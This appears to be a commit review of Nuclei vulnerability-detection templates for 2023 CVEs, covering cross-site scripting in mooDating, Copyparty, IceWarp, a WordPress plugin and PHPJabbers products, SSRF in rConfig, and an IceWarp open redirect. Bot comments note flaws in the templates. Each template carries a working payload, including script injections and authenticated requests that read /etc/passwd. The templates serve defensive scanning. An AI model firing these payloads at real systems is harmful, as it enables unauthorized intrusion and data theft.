name: mooDating 1.2 - Cross-site scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
reference:
- https://www.exploit-db.com/exploits/51628
- https://nvd.nist.gov/vuln/detail/CVE-2023-3843
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3843
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,unauth,exploitdb,moodating
http:
- method: GET
path:
- "{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains(body, "><img src=a onerror=alert(document.domain)>w71ch") && contains(body, "mooDating")'
condition: and
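
Review bot: the description keeps the advisory boilerplate ("VDB-235194 is the identifier assigned...", "NOTE: We tried to contact the vendor...") which adds nothing for a template user; trim it to the affected path and impact. The name is cased "mooDating 1.2 - Cross-site scripting" while the sibling templates in this commit use "MooDating 1.2 - Cross-Site Scripting", and metadata has no max-request.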

View File

@ -0,0 +1,32 @@
id: CVE-2023-3844
info:
name: MooDating 1.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in mooSocial mooDating 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /friends of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3844
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3844
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,moodating
http:
- method: GET
path:
- "{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model"
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>r5c3m", "mooDating")'
condition: and
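
Review bot: tags omit unauth although the request is a plain GET with no login step, and the templates for CVE-2023-3843 and CVE-2023-3849 in this same commit carry it. Please make the tag set consistent across the mooDating templates, and add max-request: 1 to metadata.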

View File

@ -0,0 +1,32 @@
id: CVE-2023-3845
info:
name: MooDating 1.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in mooSocial mooDating 1.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /friends/ajax_invite of the component URL Handler. The manipulation leads to cross site scripting. The attack may be launched remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3845
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3845
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,moodating
http:
- method: GET
path:
- "{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model"
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>", "mooDating")'
condition: and
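
Review bot: the matcher string "><img src=a onerror=alert(document.domain)>" drops the f26v4 marker that the path sends after the payload, unlike CVE-2023-3844 which matches the payload together with its r5c3m suffix. Without the marker, the templates for CVE-2023-3845, CVE-2023-3846 and CVE-2023-3847 all match the same generic string on a 404 page, so one reflecting error handler will report several CVEs. Include the per-template suffix in the match.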

View File

@ -0,0 +1,32 @@
id: CVE-2023-3846
info:
name: MooDating 1.2 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3846
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3846
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,moodating
http:
- method: GET
path:
- "{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l"
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>", "mooDating")'
condition: and
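
Review bot: the query string "?access_token&=redirect_url=aHR0..." looks malformed ("&=" instead of "&redirect_url=") and carries a hardcoded base64 redirect_url value. The injection point is the path segment after /pages, so please check whether the query is needed at all and drop or correct it. The matcher also omits the bdk84 marker that follows the payload in the path.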

View File

@ -0,0 +1,32 @@
id: CVE-2023-3847
info:
name: MooDating 1.2 - Cross-Site scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3847
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3847
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,moodating
http:
- method: GET
path:
- "{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity"
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "><img src=a onerror=alert(document.domain)>","mooDating")'
condition: and
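
Review bot: the description says the affected file is /users, but the request path is /users/viewi1omd...l43yn/108?tab=activity, which is the same path the CVE-2023-3848 template (affected file /users/view) sends. As written the two templates test the same location; this one should place the payload in the /users segment. The matcher also omits the l43yn marker and has no space after the comma in contains_all.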

View File

@ -0,0 +1,32 @@
id: CVE-2023-3848
info:
name: MooDating 1.2 - Cross-site scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3848
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3848
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,moodating
http:
- method: GET
path:
- '{{BaseURL}}/users/viewi1omd"><img%20src%3da%20onerror%3dalert(document.domain)>l43yn/108?tab=activity'
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "<img src=a onerror=alert(document.domain)>", "mooDating")'
condition: and
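
Review bot: the path mixes raw characters (", <, >) with percent-encoded ones (%20, %3d), while the other mooDating templates encode the whole payload. Encode it consistently so the request is sent the same way regardless of client normalisation. The matcher string also lacks the leading ">" and the l43yn marker, so it does not show the attribute breakout, and the name is cased "Cross-site scripting".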

View File

@ -0,0 +1,31 @@
id: CVE-2023-3849
info:
name: mooDating 1.2 - Cross-site scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.
reference:
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-3849
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3849
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,xss,unauth,moodating
http:
- method: GET
path:
- '{{BaseURL}}/find-a-matchpksyk"><img%20src%3da%20onerror%3dalert(document.cookie)>s9a64?'
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains(body, "><img src=a onerror=alert(document.cookie)>s9a64") && contains(body, "mooDating")'
condition: and
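
Review bot: this payload uses alert(document.cookie) where every other mooDating template in the commit uses alert(document.domain). Use document.domain for consistency; a detection template has no reason to reference cookies. The path also ends in a bare "?" and mixes raw and percent-encoded characters.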

View File

@ -1,53 +1,35 @@
id: CVE-2023-38501
info:
name: Copyparty v1.8.6 - Cross-Site Scripting
author: ctflearner
name: CopyParty v1.8.6 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. The vulnerability in the application's web interface could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
remediation: Upgrade to the latest version to mitigate this vulnerability.
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
remediation: Fixed in v1.8.6
reference:
- https://www.exploit-db.com/exploits/51635
- https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38
- https://github.com/9001/copyparty/security/advisories/GHSA-f54q-j679-p9hh
- https://github.com/9001/copyparty/releases/tag/v1.8.6
- https://nvd.nist.gov/vuln/detail/CVE-2023-38501
- http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-38501
cwe-id: CWE-79
epss-score: 0.00282
epss-percentile: 0.64883
cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: copyparty_project
product: copyparty
shodan-query: title:"copyparty"
tags: packetstorm,copyparty,cve,cve2023,xss
tags: cve,cve2023,copyparty,xss,oss
http:
- method: GET
path:
- "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=copyparty onerror=alert(document.domain)>'
- 'go to /'
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "<img src=copyparty onerror=alert(document.domain)>","\">go to")'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
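
Review bot: this hunk rewrites an existing template (53 lines down to 35) and shows two author lines, ctflearner followed by r3Y3r53; if the second replaces the first, the original author credit is lost and should be kept. The second description line also reads "Attack.Vulnerability that exists" with a missing space, and fields such as epss-score, epss-percentile, cpe, vendor, product and shodan-query appear only once in the hunk, so please confirm they are not being dropped. A rewrite of an existing template does not belong under a commit titled "templates added" without explanation.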

View File

@ -0,0 +1,58 @@
id: CVE-2023-39108
info:
name: rConfig 3.9.4 - Server-Side Request Forgery
author: theamanrawat
severity: high
description: |
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_b.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-39108
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-39108
cwe-id: CWE-918
metadata:
max-request: 1
verified: true
shodan-query: http.title:"rConfig"
tags: cve,cve2023,rconfig,authenticated,ssrf,lfr
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "rConfig"
- type: regex
part: body_3
regex:
- "root:.*:0:0:"
- type: status
part: header_3
status:
- 200
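
Review bot: max-request: 1 does not match the three raw requests sent here; it should be 3. The tag lfr differs from the lfi tag used in the CVE-2023-39109 template for the same class of check, so pick one. The status matcher sets part: header_3 on a type: status matcher; please confirm that is the intended way to bind it to the third response.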

View File

@ -0,0 +1,57 @@
id: CVE-2023-39109
info:
name: rConfig 3.9.4 - Server-Side Request Forgery
author: theamanrawat
severity: high
description: |
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_a.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-39109
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-39109
cwe-id: CWE-918
metadata:
verified: true
shodan-query: http.title:"rConfig"
max-request: 1
tags: cve,cve2023,rconfig,authenticated,ssrf,lfi
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "rConfig"
- type: regex
part: body_3
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
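
Review bot: the status matcher has no request index, while the word and regex matchers are bound to body_1 and body_3 and the sibling templates for CVE-2023-39108 and CVE-2023-39110 bind status with part: header_3. Make the three rConfig templates consistent so the 200 is checked on the third response. max-request: 1 should also be 3.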

View File

@ -0,0 +1,57 @@
id: CVE-2023-39110
info:
name: rConfig 3.9.4 - Server-Side Request Forgery
author: theamanrawat
severity: high
description: |
rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_%20ajaxGetFileByPath.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-39110
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-39110
cwe-id: CWE-918
metadata:
verified: true
shodan-query: http.title:"rConfig"
tags: cve,cve2023,rconfig,authenticated,ssrf,lfr
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- "root:.*:0:0:"
- type: word
part: body_1
words:
- 'rConfig'
- type: status
part: header_3
status:
- 200
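
Review bot: metadata has no max-request although three raw requests are sent. The second reference URL contains an encoded space (rConfig_%20ajaxGetFileByPath.md); please verify the link resolves. This template uses file://localhost/etc/passwd while the other two rConfig templates use file:///etc/passwd; a short comment on why the form differs would help the next maintainer.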

View File

@ -0,0 +1,35 @@
id: CVE-2023-39700
info:
name: IceWarp Mail Server v10.4.5 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-39700
- https://cwe.mitre.org/data/definitions/79.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-39700
cwe-id: CWE-79
metadata:
max-request: 2
verified: true
shodan-query: http.title:"IceWarp Server Administration"
tags: cve,cve2023,icewarp,xss,unauth
http:
- raw:
- |
GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "><img src=x onerror=confirm(document.cookie)>") && contains(body, "IceWarp")'
condition: and
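
Review bot: max-request: 2 does not match the single raw request in this template. The shodan-query targets the title "IceWarp Server Administration" while the request goes to /webmail/, so the query may not select the hosts this check applies to. The payload uses confirm(document.cookie); alert(document.domain) is the convention in the rest of the commit, and contains(content_type, "text/html") is preferred over contains(header, "text/html").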

View File

@ -0,0 +1,49 @@
id: CVE-2023-40208
info:
name: Stock Ticker <= 3.23.2 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
remediation: Fixed in version 3.23.3
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3233-reflected-cross-site-scripting
- https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-3-unauth-reflected-cross-site-scripting-xss-vulnerability
- https://wordpress.org/plugins/stock-ticker/
- https://nvd.nist.gov/vuln/detail/CVE-2023-40208
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-40208
cwe-id: CWE-79
metadata:
verified: true
tags: cve,cve2023,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+
matchers-condition: and
matchers:
- type: word
part: body
words:
- "stock_ticker"
- "onmousemove=alert(document.domain)"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
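
Review bot: the version information contradicts itself: the name says "<= 3.23.2", the description says "up to, and including, 3.23.3", and remediation says "Fixed in version 3.23.3". Please reconcile these against the references. Tags include wpscan but no wpscan reference is listed, and metadata has no max-request.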

View File

@ -0,0 +1,38 @@
id: CVE-2023-40779
info:
name: IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect
author: r3Y3r53
severity: medium
description: |
An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.
reference:
- https://medium.com/@muthumohanprasath.r/open-redirection-vulnerability-on-icewarp-webclient-product-cve-2023-40779-61176503710
- https://nvd.nist.gov/vuln/detail/CVE-2023-40779
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-40779
cwe-id: CWE-601
cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"IceWarp"
tags: cve,cve2023,icewarp,redirect
http:
- method: GET
path:
- "{{BaseURL}}/%5coast.pro/%2f%2e%2e"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
- type: status
status:
- 302
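
Review bot: the description says the issue "allows a remote attacker to execute arbitrary code", which does not match the name (Open Redirect), the cwe-id (CWE-601) or what the matcher checks (a 302 with a Location header). Describe the redirect behaviour instead. The Location regex also allows any run of characters before oast.pro, so a Location pointing at a different host that merely ends in that string would match.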

View File

@ -0,0 +1,35 @@
id: CVE-2023-4110
info:
name: PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.
reference:
- http://packetstormsecurity.com/files/173926/PHPJabbers-Availability-Booking-Calendar-5.0-Cross-Site-Scripting.html
- https://vuldb.com/?id.235957
- https://nvd.nist.gov/vuln/detail/CVE-2023-4110
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4110
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,phpjabber,jabber
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "Booking", "Arrival", "><script>alert(document.domain)</script>")'
condition: and
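
Review bot: tags use phpjabber,jabber, while other PHPJabbers templates in this commit use phpjabbers or php,jabbers; settle on one vendor tag (phpjabbers) across all of them. The fingerprint words "Booking" and "Arrival" are generic; a product-specific string would reduce false positives. The first reference uses http:// where the other packetstorm links use https://.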

View File

@ -0,0 +1,35 @@
id: CVE-2023-4111
info:
name: PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.
reference:
- https://vuldb.com/?id.235958
- https://packetstormsecurity.com/files/173927/PHPJabbers-Bus-Reservation-System-1.1-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4111
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4111
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:bus_reservation_system:1.1:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,phpjabber,jabber
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id="
matchers:
- type: dsl
dsl:
- 'contains_all(body, "You have an error in your SQL syntax", "><script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
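
Review bot: the matcher requires "You have an error in your SQL syntax" in the body, so the XSS check only fires when database errors are displayed and will miss installs that suppress them; there is also no product fingerprint. If the SQL error is the only place the payload is reflected, say so in the description. The request repeats the locale and index parameters (locale=1 ... &locale=&index=0), which looks like leftover from another template.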

View File

@ -0,0 +1,37 @@
id: CVE-2023-4112
info:
name: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
reference:
- https://www.exploitalert.com/view-details.html?id=39750
- https://cxsecurity.com/ascii/WLB-2023080012
- http://packetstormsecurity.com/files/173930/PHPJabbers-Shuttle-Booking-Software-1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4112
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4112
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"PHP Jabbers.com"
tags: cve,cve2023,xss,unauth,phpjabbers
http:
- method: GET
path:
- "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"
matchers:
- type: dsl
dsl:
- 'contains(body, "PHPJabbers") && contains(body, "><script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
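
Review bot: the description is a generic XSS sentence that does not parse ("can send to victim a link ... can perform") and names neither the product nor the injection point, which the request shows is the path after /index.php. Replace it with a description of this issue. "PHPJabbers" alone is also a broad fingerprint for a template specific to Shuttle Booking Software.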

View File

@ -0,0 +1,34 @@
id: CVE-2023-4113
info:
name: PHPJabbers Service Booking Script 1.0 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.
reference:
- http://packetstormsecurity.com/files/173931/PHPJabbers-Service-Booking-Script-1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4113
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4113
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,php,jabbers
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "Select Service(s)", "><script>alert(document.domain)</script>")'
condition: and
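
Review bot: tags split the vendor into php,jabbers; the php tag is very broad and will pull this template into unrelated php scans. Use phpjabbers as in the Shuttle Booking and Taxi Booking templates. The reference uses http:// and can be switched to https://.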

View File

@ -0,0 +1,35 @@
id: CVE-2023-4114
info:
name: PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
reference:
- https://www.exploitalert.com/view-details.html?id=39749
- http://packetstormsecurity.com/files/173932/PHPJabbers-Night-Club-Booking-1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-4114
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4114
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
tags: cve,cve2023,xss,php,jabbers
http:
- method: GET
path:
- "{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "Drinks & Extras", "Checkout", "><script>alert(document.domain)</script>")'
condition: and
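
Review bot: the fingerprint "Drinks & Extras" contains a bare ampersand; if the page emits it as an HTML entity the contains_all condition will not match, so please confirm against the raw response body. The description keeps the advisory boilerplate (VDB identifier and vendor-contact NOTE), the name uses "PHP Jabbers" where the other templates use "PHPJabbers", and the tags php,jabbers should be phpjabbers.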

View File

@ -0,0 +1,35 @@
id: CVE-2023-4115
info:
name: PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
reference:
- https://www.exploitalert.com/view-details.html?id=39747
